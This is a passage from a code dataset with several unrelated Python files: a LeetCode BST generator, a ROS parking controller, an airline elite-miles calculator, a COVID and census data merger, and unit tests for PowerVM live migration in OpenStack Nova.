= right\n\n# https://dxmahata.gitbooks.io/leetcode-python-solutions/content/unique_binary_search_trees_ii.html\nclass Solution:\n def generateTrees(self, n: int) -> List[Optional[TreeNode]]:\n # make unique BSTs from the nodes having value of 1, 2, ..., n\n if n == 0:\n return []\n else:\n return self.tree_constructor(1, n)\n \n def tree_constructor(self, m:int, n:int):\n # m: start\n # n: end\n results = []\n if m > n:\n results.append(None)\n return results #start > end. No possible BST\n else:\n for i in range(m, n+1):\n l = self.tree_constructor(m, i-1) # find all possible left subtrees\n r = self.tree_constructor(i+1, n) # find all possible right subtrees\n for left_tree in l:\n for right_tree in r:\n # for every combination of available left and right subtrees:\n curr_node = TreeNode(i)\n curr_node.left = left_tree\n curr_node.right = right_tree\n results.append(curr_node)\n return results\n ","repo_name":"jwyang21/leetcode","sub_path":"0095-unique-binary-search-trees-ii/0095-unique-binary-search-trees-ii.py","file_name":"0095-unique-binary-search-trees-ii.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20568101135","text":"#!/usr/bin/env python\nimport rospy\nfrom visual_servoing_tesse.msg import cone_location, parking_error\nfrom geometry_msgs.msg import PointStamped\nfrom ackermann_msgs.msg import AckermannDriveStamped\nimport numpy as np\n\nimport ros_utils\n\nclass ParkingController():\n DRIVE_TOPIC = \"/tesse/drive\"\n CONE_LOCATION = \"/relative_cone\"\n PARKING_ERROR_TOPIC = \"/parking_error\"\n\n L = rospy.get_param(\"pursuit/l\")\n V = rospy.get_param(\"pursuit/v\")\n D_LIM = rospy.get_param(\"pursuit/park/d_lim\")\n DETLA_LIM = rospy.get_param(\"pursuit/park/delta_lim\")\n\n X_BUMPER = 1.5\n\n def __init__(self):\n self.cone_sub = rospy.Subscriber(self.CONE_LOCATION, cone_location, self.relative_cone_callback)\n self.drive_pub = rospy.Publisher(self.DRIVE_TOPIC, AckermannDriveStamped, queue_size = 5)\n self.error_pub = rospy.Publisher(self.PARKING_ERROR_TOPIC, parking_error, queue_size = 5)\n\n self.controller = PurePursuit(self.L, self.V, self.v_park)\n\n def v_park(d, delta):\n \"\"\"\n A velocity curve which increases linearly with parking distance, and\n decreases on a bell curve (sech) with steering angle.\n \"\"\"\n d_0 = 0.6096 # Desired Parking distance (less than 2 ft from front bumper)\n v_dist = min(1/self.D_LIM * (d-self.X_BUMPER), 1.0) if d > d_0 else 0.0\n v_steer = np.sech( 2*delta / self.DELTA_LIM )\n return v_dist * v_steer\n\n def init_header(self, header, frame = \"base_link_gt\"):\n header.stamp = rospy.Time.now()\n header.frame_id = frame\n\n def relative_cone_callback(self, cone_msg):\n # Update pure pursuit controller\n x, y = cone_msg.x_pos, cone_msg.y_pos\n self.controller.update_control(x, y)\n\n # Publish Ackermann drive instructions\n drive = AckermannDriveStamped()\n self.init_header(drive.header)\n\n drive.drive.steering_angle, drive.drive.velocity =\\\n self.controller.get_control(log = False)\n\n self.drive_pub.publish(drive)\n\n # Publish parking error\n error = parking_error()\n error.x = self.controller.x\n error.y = self.controller.y\n error.distance_error = self.controller.d\n self.error_pub.publish(error)\n\n\nif __name__ == '__main__':\n try:\n rospy.init_node('ParkingController', anonymous=True)\n ParkingController()\n rospy.spin()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"mperaza0714/6.141","sub_path":"visual_servoing_tesse-master/visual_servoing_tesse-master/src/parking_controller.py","file_name":"parking_controller.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33281923453","text":"from urllib.request import urlopen as uReq\r\nfrom bs4 import BeautifulSoup as Soup\r\nfrom functools import reduce\r\nimport operator\r\nimport re\r\nimport requests\r\nimport sys\r\n\r\n\r\nPATTERN = re.compile('^[A-Za-z]{3}$')\r\nFLIGHT_PRICE = re.compile('^[0-9]+')\r\nAIRLINE = re.compile('^(delta|united|american)$', re.IGNORECASE)\r\nFARE_CLASS = re.compile('^[A-Za-z]{1}$')\r\nURL = \"http://www.webflyer.com/travel/mileage_calculator/getmileage.php?{url_params}\"\r\nFARE_CLASS_MULTIPLIER_DICTIONARY = {\r\n'Delta':\r\n {\r\n 'N': 0,\r\n\r\n 'E': 1,\r\n 'H': 1,\r\n 'K': 1,\r\n 'L': 1,\r\n 'M': 1,\r\n 'Q': 1,\r\n 'S': 1,\r\n 'T': 1,\r\n 'U': 1,\r\n 'V': 1,\r\n 'W': 1,\r\n 'X': 1,\r\n\r\n 'A': 1.5,\r\n 'B': 1.5,\r\n 'C': 1.5,\r\n 'D': 1.5,\r\n 'G': 1.5,\r\n 'I': 1.5,\r\n 'P': 1.5,\r\n 'Y': 1.5,\r\n 'Z': 1.5,\r\n\r\n 'F': 2,\r\n 'J': 2,\r\n },\r\n'United':\r\n {\r\n 'N': 0,\r\n\r\n 'M': 1,\r\n 'E': 1,\r\n 'U': 1,\r\n 'H': 1,\r\n 'Q': 1,\r\n 'V': 1,\r\n 'W': 1,\r\n 'S': 1,\r\n 'T': 1,\r\n 'L': 1,\r\n 'K': 1,\r\n 'G': 1,\r\n\r\n 'Y': 1.5,\r\n 'B': 1.5,\r\n\r\n 'A': 2,\r\n 'C': 2,\r\n 'D': 2,\r\n 'Z': 2,\r\n 'P': 2,\r\n 'F': 3,\r\n 'J': 3,\r\n },\r\n'American':\r\n {\r\n 'B': 0,\r\n\r\n 'H': 1,\r\n 'K': 1,\r\n 'M': 1,\r\n 'L': 1,\r\n 'V': 1,\r\n 'G': 1,\r\n 'S': 1,\r\n 'N': 1,\r\n 'Q': 1,\r\n 'O': 1,\r\n\r\n 'Y': 1.5,\r\n 'W': 1.5,\r\n 'P': 1.5,\r\n\r\n 'A': 2,\r\n 'D': 2,\r\n 'I': 2,\r\n 'R': 2,\r\n\r\n 'F': 3,\r\n 'J': 3,\r\n }\r\n}\r\n\r\n\r\ndef is_valid_airport_code(codes):\r\n return bool(PATTERN.search(codes))\r\n\r\n\r\ndef validate_code(codes):\r\n return is_valid_airport_code(codes) and len(codes) == 3\r\n\r\n\r\ndef is_valid_flight_cost(valid_flight_cost):\r\n return bool(FLIGHT_PRICE.search(valid_flight_cost))\r\n\r\n\r\ndef validate_flight_cost(valid_flight_cost):\r\n return is_valid_flight_cost(valid_flight_cost) and len(valid_flight_cost) >= 2\r\n\r\n\r\ndef is_valid_airline(valid_airline_name):\r\n return bool(AIRLINE.search(valid_airline_name))\r\n\r\n\r\ndef validate_airline(valid_airline_name):\r\n return is_valid_airline(valid_airline_name) and len(valid_airline_name) >= 5\r\n\r\n\r\ndef is_valid_fare_class(fare_class):\r\n return bool(FARE_CLASS.search(fare_class))\r\n\r\n\r\ndef validate_fare_class(fare_class):\r\n return is_valid_fare_class(fare_class) and len(fare_class) == 1\r\n\r\n\r\n# Prompts the user for their airports codes as a comma separated string, must be a least two, no more than five.\r\ndef get_codes(airport_user_input):\r\n codes = [c.strip() for c in airport_user_input.split(',')]\r\n if len(codes) > 5:\r\n print(\"You entered {}, max is 5 airport codes\".format(len(codes)))\r\n sys.exit(1)\r\n elif len(codes) < 2:\r\n print('You must enter at least 2 codes separated by commas: i.e. lax, sjc')\r\n sys.exit(1)\r\n elif not all([validate_code(x) for x in codes]):\r\n print(\"All codes must be alphanumeric and 3 digits. You passed in {}\".format(codes))\r\n sys.exit(1)\r\n print(\"-- Found properly formatted airport codes: {}\".format(codes))\r\n return codes\r\n\r\n\r\n# Passes the collected airport codes as a URL query, if 200 code not returned an exception is raised.\r\ndef get_city_data(codes):\r\n params = '&'.join(['city={}'.format(c) for c in codes])\r\n url = URL.format(url_params=params)\r\n page_html = requests.get(url)\r\n if page_html.status_code == 200:\r\n return page_html.content\r\n raise Exception('We are unable to query the mileage data at the moment, sorry.')\r\n\r\n\r\n# Returns the total flight miles as an integer from the HTML parse.\r\ndef get_miles_from_html(page_html):\r\n page_extract = Soup(page_html, \"html.parser\")\r\n try:\r\n table_data = page_extract.find(\"table\", attrs={\"class\": \"table_bg\"})\r\n # On the website the round-trip mileage is stored in a table, it is extracted at the -2 table index.\r\n flight_mileage = re.search('[0-9]+', table_data.findAll(\"td\")[-2].text)\r\n except AttributeError:\r\n raise sys.exit(\"Error, your airport codes could not be validated\")\r\n else:\r\n return int(flight_mileage.group())\r\n\r\n\r\n# Checks for a properly formatted flight cost.\r\ndef get_flight_cost(flight_cost_input):\r\n valid_flight_cost = flight_cost_input.strip('$')\r\n if len(valid_flight_cost) <= 1:\r\n print(\"Please input a flight price greater than $10\")\r\n sys.exit(1)\r\n elif len(valid_flight_cost) >= 4:\r\n print(\"Please input a flight price less than $1,000\")\r\n sys.exit(1)\r\n elif not validate_flight_cost(valid_flight_cost):\r\n print(\"Please use only whole numbers with no symbols or commas\")\r\n sys.exit(1)\r\n print(\"-- Flight cost stored: ${}\".format(valid_flight_cost))\r\n return valid_flight_cost\r\n\r\n\r\n# Returns the airline name if the input matches values; Delta, United, or American.\r\ndef get_airline(airline_input):\r\n valid_airline_name = airline_input.capitalize()\r\n if not validate_airline(valid_airline_name):\r\n print(\"Please input either; Delta, United, or American\")\r\n sys.exit(1)\r\n print(\"-- Airline name stored: {}\".format(valid_airline_name))\r\n return valid_airline_name\r\n\r\n\r\n# Returns fare class character [key] to later lookup the corresponding value [multiplier].\r\ndef get_fare_class(fare_class_input):\r\n fare_class = fare_class_input.upper()\r\n if len(fare_class) != 1:\r\n print(\"You may only enter a single letter for your fare class; i.e. K\")\r\n sys.exit(1)\r\n elif not validate_fare_class(fare_class):\r\n print(\"You may only enter one character A-Z\")\r\n sys.exit(1)\r\n print(\"-- Fare code stored: {}\".format(fare_class))\r\n return fare_class\r\n\r\n\r\n# Returns the fare class multiplier as a float from the nested 'multiplier' dictionary.\r\ndef get_from_airline_dict(valid_airline_name, fare_class):\r\n try:\r\n multiplier = FARE_CLASS_MULTIPLIER_DICTIONARY[valid_airline_name][fare_class]\r\n return multiplier\r\n except KeyError:\r\n print(\"Sorry, that fare class is not a choice for {} Airlines.\".format(valid_airline_name))\r\n sys.exit(1)\r\n\r\n\r\n# Performs calculation to determine the EQM's and CPM by passing in fare cost, multiplier, and distance.\r\ndef get_cpm_calculation(multiplier, valid_flight_cost, flight_mileage):\r\n # The flight cost is divided by the flight mileage, then multiplied by the fare class multiplier to return the CPM.\r\n cpm = ((int(valid_flight_cost) / int(flight_mileage)) * int(multiplier)) * 100\r\n # The EQM, or elite qualifying miles,\r\n elite_miles_earned = int(flight_mileage) * int(multiplier)\r\n if cpm == 0:\r\n print(\"Sorry, your EQM and CPM could not be calculated\")\r\n sys.exit(1)\r\n elif valid_airline_name == 'Delta':\r\n print(\"This \" + str(\"{0:,g}\".format(flight_mileage)) + \" mile round-trip flight \"\r\n \"on Delta Airlines in fare class: \" + str(fare_class) + \" = '\" + str(multiplier) + \"x',\"\r\n \" which calculates at \" + str(format(cpm, '.2f')) + \" 'Cents Per Mile',\"\r\n \" earns you \" + (\"{0:,g}\".format(elite_miles_earned)) + \" MQMs.\")\r\n elif valid_airline_name == 'United':\r\n print(\"This \" + str(\"{0:,g}\".format(flight_mileage)) + \" mile round-trip flight \"\r\n \"on United Airlines in fare class: \" + str(fare_class) + \" = '\" + str(multiplier) + \"x',\"\r\n \" which calculates at \" + str(format(cpm, '.2f')) + \" 'Cents Per Mile',\"\r\n \" earns you \" + (\"{0:,g}\".format(elite_miles_earned)) + \" PQMs.\")\r\n elif valid_airline_name == 'American':\r\n print(\"This \" + str(\"{0:,g}\".format(flight_mileage)) + \" mile round-trip flight \"\r\n \"on American Airlines in fare class: \" + str(fare_class) + \" = '\" + str(multiplier) + \"x',\"\r\n \" which calculates at \" + str(format(cpm, '.2f')) + \" 'Cents Per Mile',\"\r\n \" earns you \" + (\"{0:,g}\".format(elite_miles_earned)) + \" EQMs.\")\r\n sys.exit(1)\r\n\r\n\r\nif __name__ == '__main__':\r\n airport_user_input = input(\"Input up to 5 airport codes ( i.e. lax, jfk, lhr ) \")\r\n codes = get_codes(airport_user_input)\r\n page_html = get_city_data(codes)\r\n flight_mileage = get_miles_from_html(page_html)\r\n flight_cost_input = input(\"What's the round-trip cost as a whole number with no symbols (i.e. 425)? \")\r\n valid_flight_cost = get_flight_cost(flight_cost_input)\r\n airline_input = input(\"Are you flying Delta, United, or American? \")\r\n valid_airline_name = get_airline(airline_input)\r\n fare_class_input = input(\"What is your fare class code? i.e: N \")\r\n fare_class = get_fare_class(fare_class_input)\r\n flight_mileage = get_miles_from_html(page_html)\r\n multiplier = get_from_airline_dict(valid_airline_name, fare_class)\r\n get_cpm_calculation(multiplier, valid_flight_cost, flight_mileage)\r\n\r\n","repo_name":"ManOfMiles/eqmCalc","sub_path":"cpmcalculator.py","file_name":"cpmcalculator.py","file_ext":"py","file_size_in_byte":8897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34982377359","text":"\"\"\"Takes covid county data and census data and output csv file.\n\nExamples:\n\n\"\"\"\nimport logging\n\nimport click\nimport pandas as pd\nimport requests\n\n\ndef dl_file(input_url: str, output_file: str):\n \"\"\"Download file and save to output\n Args:\n input_url: file url\n output_file: save file to path\n \"\"\"\n try:\n resp = requests.get(input_url, allow_redirects=True)\n with open(output_file, 'wb') as fd:\n fd.write(resp.content)\n except Exception as exc:\n logging.exception(\"unable to download %s, %s\", input_url, exc)\n return None\n return output_file\n\n\ndef combine_covid_data(county_data: str, census_data: str):\n \"\"\"Create final table with this schema:\n population: population,\n case: daily cases,\n deaths: daily deaths,\n cumulative_cases: cumulative cases to date, and\n cumulative_deaths: cumulative death\n\n Args:\n county_data:\n census_data:\n\n Effects: Writes to CSV\n Return: None\n \"\"\"\n # load dataframe\n #\n df1 = None\n df2 = None\n\n try:\n df1 = pd.read_csv(county_data, dtype={\"fips\": str})\n df2 = pd.read_csv(census_data,\n encoding=\"latin-1\", dtype={\"STATE\": str, \"COUNTY\": str})\n except Exception as exc:\n logging.warning(\"unable to load df: %s\", str(exc))\n return pd.DataFrame()\n logging.info(\"processing population data: %s, %s\", len(df2), len(df2.columns))\n # FIPS 6-4 used the 2 digits FIPS state code followed by 3 digits county\n df2[\"fips\"] = df2[\"STATE\"] + df2[\"COUNTY\"]\n # use POPESTIMATE2019 as population\n pop_df = df2[[\"fips\", \"POPESTIMATE2019\"]]\n pop_df = pop_df.rename(columns={\"POPESTIMATE2019\": \"population\"})\n\n logging.info(\"processing county data %s, %s\", len(df1), len(df1[\"fips\"].unique()))\n # groupby and aggregate cases, deaths\n # cols = [\"fips\", \"date\", \"county\", \"state\"]\n cols = [\"fips\", \"date\"]\n\n # reorder and drop state and country\n df1 = df1[[\"fips\", \"date\", \"cases\", \"deaths\"]]\n # drop non-county data\n notna_df = df1[df1[\"fips\"].notna()]\n\n # set multicol index, pivot date values to columns, and then unpivot date labels\n dates_df = notna_df.set_index(cols).unstack(\"date\", fill_value=0).stack(\"date\")\n dates_df = dates_df.reset_index()\n\n logging.info(\"creating diff columns\")\n # get diff in separate df\n diff_df = dates_df.groupby([\"fips\"]).agg(\n {\"cases\": \"diff\", \"deaths\": \"diff\"}).fillna(0)\n dates_df[\"daily_cases\"] = diff_df[\"cases\"]\n dates_df[\"daily_deaths\"] = diff_df[\"deaths\"]\n\n dates_df = dates_df.rename(columns={\"cases\": \"cumulative_cases\"})\n dates_df = dates_df.rename(columns={\"deaths\": \"cumulative_deaths\"})\n\n # do join on census data and population data on column fips\n # res_df = pd.merge(group_fin_df, pop_df, on=\"fips\", how=\"left\")\n res_df = pd.merge(pop_df, dates_df, on=\"fips\", how=\"right\")\n res_df = res_df[[\"fips\", \"date\", \"daily_cases\", \"daily_deaths\", \"cumulative_cases\", \"cumulative_deaths\"]]\n logging.info(\"sample data: count: %s \\n%s\", len(res_df), res_df.head(10))\n\n return res_df\n\n\n@click.command()\n@click.option(\"--covid_data\", default=\"data/us-counties.csv\", help=\"Path to covid data\")\n@click.option(\"--census_data\", default=\"data/co-est2019-alldata.csv\", help=\"Path to census data\")\n@click.option(\"--output\", default=\"covid_population.csv\", help=\"Path to output file\")\n@click.option(\"--csv_out\", default=True, help=\"Write to CSV or print sample\")\n@click.option(\"--download\", \"-d\", is_flag=True, help=\"Download from url\")\n@click.option(\"--verbose\", is_flag=True, help=\"More logging messages\")\n# pylint: disable=R0913\ndef main(covid_data=\"\", census_data=\"\", output=\"\", csv_out=True, download=False, verbose=False):\n \"\"\"Takes covid county data and census data, process, and output csv file.\n Examples:\n\n $ python covid_data.py --covid_data data/us-counties.csv \\\\\n --census_data data/co-est2019-alldata.csv --output res.csv\n \"\"\"\n # Above is used by click help\n \"\"\"Main function that uses click for option handling\n Args:\n covid_data: covid input file or url\n census_data: census input file or url\n output: output csv\n csv_out: csv output or print sample\n download: download the files\n verbose: verbose usage\n Effects: Write out file or print\n Return: None\n \"\"\"\n if verbose:\n logging.getLogger().setLevel(logging.DEBUG)\n else:\n logging.getLogger().setLevel(logging.INFO)\n df = pd.DataFrame()\n if download:\n dl_covid = dl_file(covid_data, \"dl-us-counties.csv\")\n dl_census = dl_file(census_data, \"dl-census-est2019.csv\")\n if dl_covid and dl_census:\n df = combine_covid_data(dl_covid, dl_census)\n else:\n logging.error(\"ERROR: download url: %s, %s\",\n covid_data, census_data)\n else:\n logging.info(\"processing data\")\n df = combine_covid_data(covid_data, census_data)\n if csv_out:\n logging.info(\"writing output file %s\", output)\n df.to_csv(output, index=False)\n else:\n logging.warning(\"non csv output not supported\")\n print(\"sample data table\\n%s\", str(df.head(100)))\n\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"statsoah/covid_county_data","sub_path":"covid_data.py","file_name":"covid_data.py","file_ext":"py","file_size_in_byte":5306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10594899149","text":"from __future__ import absolute_import\n\nimport fixtures\nimport mock\n\nfrom nova import exception\nfrom nova import objects\nfrom nova.objects import migrate_data as mig_obj\nfrom nova import test\nfrom nova.tests.unit import fake_network\n\nfrom nova_powervm.tests.virt import powervm\nfrom nova_powervm.tests.virt.powervm import fixtures as fx\nfrom nova_powervm.virt.powervm import live_migration as lpm\n\n\nclass TestLPM(test.NoDBTestCase):\n def setUp(self):\n super(TestLPM, self).setUp()\n\n self.flags(disk_driver='localdisk', group='powervm')\n self.drv_fix = self.useFixture(fx.PowerVMComputeDriver())\n self.drv = self.drv_fix.drv\n self.apt = self.drv.adapter\n\n self.inst = objects.Instance(**powervm.TEST_INSTANCE)\n\n self.network_infos = fake_network.fake_get_instance_nw_info(self, 1)\n self.inst.info_cache = objects.InstanceInfoCache(\n network_info=self.network_infos)\n\n self.mig_data = mig_obj.PowerVMLiveMigrateData()\n self.mig_data.host_mig_data = {}\n self.mig_data.dest_ip = '1'\n self.mig_data.dest_user_id = 'neo'\n self.mig_data.dest_sys_name = 'a'\n self.mig_data.public_key = 'PublicKey'\n self.mig_data.dest_proc_compat = 'a,b,c'\n self.mig_data.vol_data = {}\n self.mig_data.vea_vlan_mappings = {}\n\n self.lpmsrc = lpm.LiveMigrationSrc(self.drv, self.inst, self.mig_data)\n self.lpmdst = lpm.LiveMigrationDest(self.drv, self.inst)\n\n self.add_key = self.useFixture(fixtures.MockPatch(\n 'pypowervm.tasks.management_console.add_authorized_key')).mock\n self.get_key = self.useFixture(fixtures.MockPatch(\n 'pypowervm.tasks.management_console.get_public_key')).mock\n self.get_key.return_value = 'PublicKey'\n\n # Short path to the host's migration_data\n self.host_mig_data = self.drv.host_wrapper.migration_data\n\n @mock.patch('pypowervm.tasks.storage.ScrubOrphanStorageForLpar',\n autospec=True)\n @mock.patch('nova_powervm.virt.powervm.media.ConfigDrivePowerVM',\n autospec=True)\n @mock.patch('nova_powervm.virt.powervm.vm.get_instance_wrapper',\n autospec=True)\n @mock.patch('pypowervm.tasks.vterm.close_vterm', autospec=True)\n def test_lpm_source(self, mock_vterm_close, mock_get_wrap,\n mock_cd, mock_scrub):\n self.host_mig_data['active_migrations_supported'] = 4\n self.host_mig_data['active_migrations_in_progress'] = 2\n\n with mock.patch.object(\n self.lpmsrc, '_check_migration_ready', return_value=None):\n\n # Test the bad path first, then patch in values to make succeed\n mock_wrap = mock.Mock(id=123)\n mock_get_wrap.return_value = mock_wrap\n\n self.assertRaises(exception.MigrationPreCheckError,\n self.lpmsrc.check_source, 'context',\n 'block_device_info', [])\n\n # Patch the proc compat fields, to get further\n pm = mock.PropertyMock(return_value='b')\n type(mock_wrap).proc_compat_mode = pm\n\n self.assertRaises(exception.MigrationPreCheckError,\n self.lpmsrc.check_source, 'context',\n 'block_device_info', [])\n\n pm = mock.PropertyMock(return_value='Not_Migrating')\n type(mock_wrap).migration_state = pm\n\n # Get a volume driver.\n mock_vol_drv = mock.MagicMock()\n\n # Finally, good path.\n self.lpmsrc.check_source('context', 'block_device_info',\n [mock_vol_drv])\n # Ensure we built a scrubber.\n mock_scrub.assert_called_with(mock.ANY, 123)\n # Ensure we added the subtasks to remove the vopts.\n mock_cd.return_value.dlt_vopt.assert_called_once_with(\n mock.ANY, stg_ftsk=mock_scrub.return_value,\n remove_mappings=False)\n # And ensure the scrubber was executed\n mock_scrub.return_value.execute.assert_called_once_with()\n mock_vol_drv.pre_live_migration_on_source.assert_called_once_with(\n {})\n\n # Ensure migration counts are validated\n self.host_mig_data['active_migrations_in_progress'] = 4\n self.assertRaises(exception.MigrationPreCheckError,\n self.lpmsrc.check_source, 'context',\n 'block_device_info', [])\n\n # Ensure the vterm was closed\n mock_vterm_close.assert_called_once_with(\n self.apt, mock_wrap.uuid)\n\n def test_lpm_dest(self):\n src_compute_info = {'stats': {'memory_region_size': 1}}\n dst_compute_info = {'stats': {'memory_region_size': 1}}\n\n self.host_mig_data['active_migrations_supported'] = 4\n self.host_mig_data['active_migrations_in_progress'] = 2\n with mock.patch.object(self.drv.host_wrapper, 'refresh') as mock_rfh:\n\n self.lpmdst.check_destination(\n 'context', src_compute_info, dst_compute_info)\n mock_rfh.assert_called_once_with()\n\n # Ensure migration counts are validated\n self.host_mig_data['active_migrations_in_progress'] = 4\n self.assertRaises(exception.MigrationPreCheckError,\n self.lpmdst.check_destination, 'context',\n src_compute_info, dst_compute_info)\n # Repair the stat\n self.host_mig_data['active_migrations_in_progress'] = 2\n\n # Ensure diff memory sizes raises an exception\n dst_compute_info['stats']['memory_region_size'] = 2\n self.assertRaises(exception.MigrationPreCheckError,\n self.lpmdst.check_destination, 'context',\n src_compute_info, dst_compute_info)\n\n @mock.patch('pypowervm.tasks.storage.ComprehensiveScrub', autospec=True)\n @mock.patch('nova_powervm.virt.powervm.vif.'\n 'pre_live_migrate_at_destination', autospec=True)\n def test_pre_live_mig(self, mock_vif_pre, mock_scrub):\n vol_drv = mock.MagicMock()\n network_infos = [{'type': 'pvm_sea'}]\n\n def update_vea_mapping(adapter, host_uuid, instance, network_info,\n vea_vlan_mappings):\n # Make sure what comes in is None, but that we change it.\n self.assertEqual(vea_vlan_mappings, {})\n vea_vlan_mappings['test'] = 'resp'\n\n mock_vif_pre.side_effect = update_vea_mapping\n\n resp = self.lpmdst.pre_live_migration(\n 'context', 'block_device_info', network_infos, 'disk_info',\n self.mig_data, [vol_drv])\n\n # Make sure the pre_live_migrate_at_destination was invoked for the vif\n mock_vif_pre.assert_called_once_with(\n self.drv.adapter, self.drv.host_uuid, self.inst, network_infos[0],\n mock.ANY)\n self.assertEqual({'test': 'resp'}, self.mig_data.vea_vlan_mappings)\n\n # Make sure we get something back, and that the volume driver was\n # invoked.\n self.assertIsNotNone(resp)\n vol_drv.pre_live_migration_on_destination.assert_called_once_with(\n self.mig_data.vol_data)\n self.assertEqual(1, mock_scrub.call_count)\n self.add_key.assert_called_once_with(self.apt, 'PublicKey')\n\n vol_drv.reset_mock()\n raising_vol_drv = mock.Mock()\n raising_vol_drv.pre_live_migration_on_destination.side_effect = (\n Exception('foo'))\n self.assertRaises(\n exception.MigrationPreCheckError, self.lpmdst.pre_live_migration,\n 'context', 'block_device_info', network_infos, 'disk_info',\n self.mig_data, [vol_drv, raising_vol_drv])\n vol_drv.pre_live_migration_on_destination.assert_called_once_with({})\n (raising_vol_drv.pre_live_migration_on_destination.\n assert_called_once_with({}))\n\n def test_src_cleanup(self):\n vol_drv = mock.Mock()\n self.lpmdst.cleanup_volume(vol_drv)\n # Ensure the volume driver is not called\n self.assertEqual(0, vol_drv.cleanup_volume_at_destination.call_count)\n\n def test_src_cleanup_valid(self):\n vol_drv = mock.Mock()\n self.lpmdst.pre_live_vol_data = {'vscsi-vol-id': 'fake_udid'}\n self.lpmdst.cleanup_volume(vol_drv)\n # Ensure the volume driver was called to clean up the volume.\n vol_drv.cleanup_volume_at_destination.assert_called_once()\n\n @mock.patch('pypowervm.tasks.migration.migrate_lpar', autospec=True)\n @mock.patch('nova_powervm.virt.powervm.live_migration.LiveMigrationSrc.'\n '_convert_nl_io_mappings', autospec=True)\n @mock.patch('nova_powervm.virt.powervm.vif.pre_live_migrate_at_source',\n autospec=True)\n def test_live_migration(self, mock_vif_pre_lpm, mock_convert_mappings,\n mock_migr):\n mock_trunk = mock.MagicMock()\n mock_vif_pre_lpm.return_value = [mock_trunk]\n mock_convert_mappings.return_value = ['AABBCCDDEEFF/5']\n\n self.lpmsrc.lpar_w = mock.Mock()\n self.lpmsrc.live_migration('context', self.mig_data)\n mock_migr.assert_called_once_with(\n self.lpmsrc.lpar_w, 'a', sdn_override=True, tgt_mgmt_svr='1',\n tgt_mgmt_usr='neo', validate_only=False,\n virtual_fc_mappings=None, virtual_scsi_mappings=None,\n vlan_check_override=True, vlan_mappings=['AABBCCDDEEFF/5'])\n\n # Network assertions\n mock_vif_pre_lpm.assert_called_once_with(\n self.drv.adapter, self.drv.host_uuid, self.inst, mock.ANY)\n mock_trunk.delete.assert_called_once()\n\n # Test that we raise errors received during migration\n mock_migr.side_effect = ValueError()\n self.assertRaises(ValueError, self.lpmsrc.live_migration, 'context',\n self.mig_data)\n mock_migr.assert_called_with(\n self.lpmsrc.lpar_w, 'a', sdn_override=True, tgt_mgmt_svr='1',\n tgt_mgmt_usr='neo', validate_only=False,\n virtual_fc_mappings=None, virtual_scsi_mappings=None,\n vlan_mappings=['AABBCCDDEEFF/5'], vlan_check_override=True)\n\n def test_convert_nl_io_mappings(self):\n # Test simple None case\n self.assertIsNone(self.lpmsrc._convert_nl_io_mappings(None))\n\n # Do some mappings\n test_mappings = {'aa:bb:cc:dd:ee:ff': 5, 'aa:bb:cc:dd:ee:ee': 126}\n expected = ['AABBCCDDEEFF/5', 'AABBCCDDEEEE/126']\n self.assertEqual(\n set(expected),\n set(self.lpmsrc._convert_nl_io_mappings(test_mappings)))\n\n @mock.patch('pypowervm.tasks.migration.migrate_recover', autospec=True)\n def test_rollback(self, mock_migr):\n self.lpmsrc.lpar_w = mock.Mock()\n\n # Test no need to rollback\n self.lpmsrc.lpar_w.migration_state = 'Not_Migrating'\n self.lpmsrc.rollback_live_migration('context')\n self.assertTrue(self.lpmsrc.lpar_w.refresh.called)\n self.assertFalse(mock_migr.called)\n\n # Test calling the rollback\n self.lpmsrc.lpar_w.reset_mock()\n self.lpmsrc.lpar_w.migration_state = 'Pretend its Migrating'\n self.lpmsrc.rollback_live_migration('context')\n self.assertTrue(self.lpmsrc.lpar_w.refresh.called)\n mock_migr.assert_called_once_with(self.lpmsrc.lpar_w, force=True)\n\n # Test exception from rollback\n mock_migr.reset_mock()\n self.lpmsrc.lpar_w.reset_mock()\n mock_migr.side_effect = ValueError()\n self.lpmsrc.rollback_live_migration('context')\n self.assertTrue(self.lpmsrc.lpar_w.refresh.called)\n mock_migr.assert_called_once_with(self.lpmsrc.lpar_w, force=True)\n\n def test_check_migration_ready(self):\n lpar_w, host_w = mock.Mock(), mock.Mock()\n lpar_w.can_lpm.return_value = (True, None)\n self.lpmsrc._check_migration_ready(lpar_w, host_w)\n lpar_w.can_lpm.assert_called_once_with(host_w, migr_data={})\n\n lpar_w.can_lpm.return_value = (False, 'This is the reason message.')\n self.assertRaises(exception.MigrationPreCheckError,\n self.lpmsrc._check_migration_ready, lpar_w, host_w)\n\n @mock.patch('pypowervm.tasks.migration.migrate_abort', autospec=True)\n def test_migration_abort(self, mock_mig_abort):\n self.lpmsrc.lpar_w = mock.Mock()\n self.lpmsrc.migration_abort()\n mock_mig_abort.assert_called_once_with(self.lpmsrc.lpar_w)\n\n @mock.patch('pypowervm.tasks.migration.migrate_recover', autospec=True)\n def test_migration_recover(self, mock_mig_recover):\n self.lpmsrc.lpar_w = mock.Mock()\n self.lpmsrc.migration_recover()\n mock_mig_recover.assert_called_once_with(\n self.lpmsrc.lpar_w, force=True)\n\n @mock.patch('nova_powervm.virt.powervm.vif.post_live_migrate_at_source',\n autospec=True)\n def test_post_live_migration_at_source(self, mock_vif_post_lpm_at_source):\n network_infos = [{'devname': 'tap-dev1', 'address': 'mac-addr1',\n 'network': {'bridge': 'br-int'}, 'id': 'vif_id_1'},\n {'devname': 'tap-dev2', 'address': 'mac-addr2',\n 'network': {'bridge': 'br-int'}, 'id': 'vif_id_2'}]\n self.lpmsrc.post_live_migration_at_source(network_infos)\n # Assertions\n for network_info in network_infos:\n mock_vif_post_lpm_at_source.assert_any_call(mock.ANY, mock.ANY,\n mock.ANY, network_info)\n\n @mock.patch('nova_powervm.virt.powervm.tasks.storage.SaveBDM.execute',\n autospec=True)\n def test_post_live_migration_at_dest(self, mock_save_bdm):\n bdm1, bdm2, vol_drv1, vol_drv2 = [mock.Mock()] * 4\n vals = [(bdm1, vol_drv1), (bdm2, vol_drv2)]\n 